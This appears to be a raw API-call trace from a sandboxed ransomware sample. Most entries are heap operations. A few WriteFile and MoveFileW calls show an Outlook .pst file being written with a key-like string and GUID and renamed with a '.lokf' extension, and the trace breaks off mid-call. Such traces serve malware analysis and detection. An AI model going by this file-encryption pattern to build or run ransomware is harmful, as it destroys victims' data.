[0059.422] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32452d8 | out: hHeap=0x660000) returned 1 [0059.422] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242688 | out: hHeap=0x660000) returned 1 [0059.422] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278ec0 | out: hHeap=0x660000) returned 1 [0059.422] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242348 | out: hHeap=0x660000) returned 1 [0059.422] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3296380 | out: hHeap=0x660000) returned 1 [0059.422] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32afc78 | out: hHeap=0x660000) returned 1 [0059.422] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257208 | out: hHeap=0x660000) returned 1 [0059.422] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32995a0 | out: hHeap=0x660000) returned 1 [0059.422] WriteFile (in: hFile=0x5cc, lpBuffer=0x9c88ae8*, nNumberOfBytesToWrite=0x25800, lpNumberOfBytesWritten=0x9f4fb14, lpOverlapped=0x0 | out: lpBuffer=0x9c88ae8*, lpNumberOfBytesWritten=0x9f4fb14*=0x25800, lpOverlapped=0x0) returned 1 [0059.422] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c88ae8 | out: hHeap=0x660000) returned 1 [0059.423] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x42400, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.423] WriteFile (in: hFile=0x5cc, lpBuffer=0x326f4e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326f4e8*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0059.517] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f4e8 | out: hHeap=0x660000) returned 1 [0059.517] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b588 [0059.518] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x428) returned 0x326a370 [0059.518] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9", cchWideChar=-1, lpMultiByteStr=0x326a370, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9", lpUsedDefaultChar=0x0) returned 41 [0059.518] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x430) returned 0x3294ac8 [0059.518] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326a370 | out: hHeap=0x660000) returned 1 [0059.518] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b588 | out: hHeap=0x660000) returned 1 [0059.518] WriteFile (in: hFile=0x5cc, lpBuffer=0x3294ac8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x3294ac8*, lpNumberOfBytesWritten=0x9f4fb50*=0x28, lpOverlapped=0x0) returned 1 [0059.518] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3294ac8 | out: hHeap=0x660000) returned 1 [0059.518] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0059.518] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0059.518] CloseHandle (hObject=0x5cc) returned 1 [0059.520] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262bd0 [0059.520] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8b0) returned 0x3268798 [0059.520] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262bd0 | out: hHeap=0x660000) returned 1 [0059.520] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\outlook files\\voeimd@djhreuu.uhd.pst"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\outlook files\\voeimd@djhreuu.uhd.pst.lokf")) returned 1 [0059.521] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0059.521] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0059.521] VirtualFree (lpAddress=0x3700000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0059.522] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3201650 | out: hHeap=0x660000) returned 1 [0059.522] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5a868660, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x5a868660, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x6228cf40, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x42400, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="voeimd@djhreuu.uhd.pst", cAlternateFileName="VOEIMD~1.PST")) returned 0 [0059.522] FindClose (in: hFindFile=0x68d798 | out: hFindFile=0x68d798) returned 1 [0059.522] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32575c0 | out: hHeap=0x660000) returned 1 [0059.522] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3269928 | out: hHeap=0x660000) returned 1 [0059.522] PeekMessageW (in: lpMsg=0x9f4ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4ff08) returned 0 [0059.522] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8a50 [0059.522] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0059.522] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b89c8 [0059.522] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0059.523] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.523] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b89c8 | out: hHeap=0x660000) returned 1 [0059.523] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b89c8 [0059.523] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0059.523] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.523] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b89c8 | out: hHeap=0x660000) returned 1 [0059.523] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b89c8 [0059.523] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0059.523] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.523] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b89c8 | out: hHeap=0x660000) returned 1 [0059.523] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b89c8 [0059.523] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0059.523] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.523] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b89c8 | out: hHeap=0x660000) returned 1 [0059.523] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b89c8 [0059.523] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0059.523] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.523] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b89c8 | out: hHeap=0x660000) returned 1 [0059.523] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b89c8 [0059.523] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0059.523] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.523] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b89c8 | out: hHeap=0x660000) returned 1 [0059.523] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b89c8 [0059.523] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0059.523] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc2e) returned 0x9c778e8 [0059.523] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.523] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0059.523] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b89c8 | out: hHeap=0x660000) returned 1 [0059.523] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b89c8 [0059.523] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0059.523] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.523] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b89c8 | out: hHeap=0x660000) returned 1 [0059.523] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b89c8 [0059.523] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0059.524] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.524] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b89c8 | out: hHeap=0x660000) returned 1 [0059.524] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b89c8 [0059.524] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0059.524] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0059.524] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b89c8 | out: hHeap=0x660000) returned 1 [0059.524] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b89c8 [0059.524] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0059.524] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0059.524] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b89c8 | out: hHeap=0x660000) returned 1 [0059.524] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b89c8 [0059.524] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0059.524] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.524] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b89c8 | out: hHeap=0x660000) returned 1 [0059.524] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b89c8 [0059.524] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0059.524] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.524] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b89c8 | out: hHeap=0x660000) returned 1 [0059.524] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b89c8 [0059.524] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0059.524] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.524] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b89c8 | out: hHeap=0x660000) returned 1 [0059.524] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b89c8 [0059.524] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0059.524] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.524] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b89c8 | out: hHeap=0x660000) returned 1 [0059.524] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b89c8 [0059.524] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0059.524] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.524] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b89c8 | out: hHeap=0x660000) returned 1 [0059.524] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b89c8 [0059.524] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0059.524] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.524] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b89c8 | out: hHeap=0x660000) returned 1 [0059.525] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b89c8 [0059.525] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0059.525] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.525] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b89c8 | out: hHeap=0x660000) returned 1 [0059.525] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b89c8 [0059.525] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0059.525] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.525] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b89c8 | out: hHeap=0x660000) returned 1 [0059.525] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b89c8 [0059.525] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0059.525] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.525] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b89c8 | out: hHeap=0x660000) returned 1 [0059.525] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b89c8 [0059.525] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0059.525] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.525] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b89c8 | out: hHeap=0x660000) returned 1 [0059.525] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b89c8 [0059.525] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0059.525] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.525] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b89c8 | out: hHeap=0x660000) returned 1 [0059.525] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b89c8 [0059.525] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0059.525] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x9c778e8 [0059.525] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.525] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0059.525] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b89c8 | out: hHeap=0x660000) returned 1 [0059.525] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b89c8 [0059.525] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0059.525] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.525] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b89c8 | out: hHeap=0x660000) returned 1 [0059.525] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b89c8 [0059.525] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0059.525] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc2e) returned 0x9c778e8 [0059.525] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.525] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0059.526] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b89c8 | out: hHeap=0x660000) returned 1 [0059.526] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b89c8 [0059.526] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0059.526] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0059.526] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b89c8 | out: hHeap=0x660000) returned 1 [0059.526] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b89c8 [0059.526] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0059.526] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0059.526] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b89c8 | out: hHeap=0x660000) returned 1 [0059.526] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b89c8 [0059.526] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0059.526] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.526] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b89c8 | out: hHeap=0x660000) returned 1 [0059.526] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b89c8 [0059.526] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0059.526] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.526] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b89c8 | out: hHeap=0x660000) returned 1 [0059.526] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b89c8 [0059.526] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0059.526] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x9c778e8 [0059.526] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.526] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0059.526] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b89c8 | out: hHeap=0x660000) returned 1 [0059.526] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b89c8 [0059.526] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0059.526] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.526] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b89c8 | out: hHeap=0x660000) returned 1 [0059.526] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b89c8 [0059.526] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0059.526] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.526] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b89c8 | out: hHeap=0x660000) returned 1 [0059.526] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b89c8 [0059.526] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0059.527] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.527] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b89c8 | out: hHeap=0x660000) returned 1 [0059.527] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b89c8 [0059.527] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0059.527] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.527] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b89c8 | out: hHeap=0x660000) returned 1 [0059.527] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b89c8 [0059.527] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0059.527] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.527] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b89c8 | out: hHeap=0x660000) returned 1 [0059.527] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b89c8 [0059.527] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0059.527] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.527] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b89c8 | out: hHeap=0x660000) returned 1 [0059.527] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b89c8 [0059.527] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0059.527] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.527] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b89c8 | out: hHeap=0x660000) returned 1 [0059.527] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b89c8 [0059.527] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0059.527] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.527] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b89c8 | out: hHeap=0x660000) returned 1 [0059.527] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b89c8 [0059.527] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0059.527] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.527] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b89c8 | out: hHeap=0x660000) returned 1 [0059.527] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b89c8 [0059.527] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0059.527] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x9c778e8 [0059.527] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.527] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0059.527] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b89c8 | out: hHeap=0x660000) returned 1 [0059.527] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b89c8 [0059.527] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0059.528] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.528] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b89c8 | out: hHeap=0x660000) returned 1 [0059.528] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b89c8 [0059.528] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0059.528] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0059.528] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b89c8 | out: hHeap=0x660000) returned 1 [0059.528] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b89c8 [0059.528] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0059.528] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0059.528] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b89c8 | out: hHeap=0x660000) returned 1 [0059.528] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b89c8 [0059.528] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0059.528] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.528] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b89c8 | out: hHeap=0x660000) returned 1 [0059.528] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b89c8 [0059.528] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0059.528] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.528] HeapFree (in: hHeap=0x660000, 